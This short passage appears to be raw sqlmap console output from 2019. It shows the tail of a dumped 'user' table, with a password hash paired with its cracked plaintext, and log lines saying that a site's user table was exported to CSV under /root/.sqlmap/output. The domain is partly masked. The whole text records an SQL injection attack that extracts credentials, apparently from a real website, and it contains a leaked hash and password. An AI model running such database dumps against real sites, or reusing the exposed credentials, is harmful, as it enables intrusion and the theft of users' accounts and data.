+---------+---------------------------------------------------+
| <blank> | 4d9012b4a77a9524d675dad27c3276ab5705e5e8 (123321) |
+---------+---------------------------------------------------+
[16:22:45] [INFO] table 'bdm266490221_db.`user`' dumped to CSV file '/root/.sqlmap/output/www.****.com/dump/bdm266490221_db/user.csv'
[16:22:45] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.***.com'
[*] ending @ 16:22:45 /2019-05-28/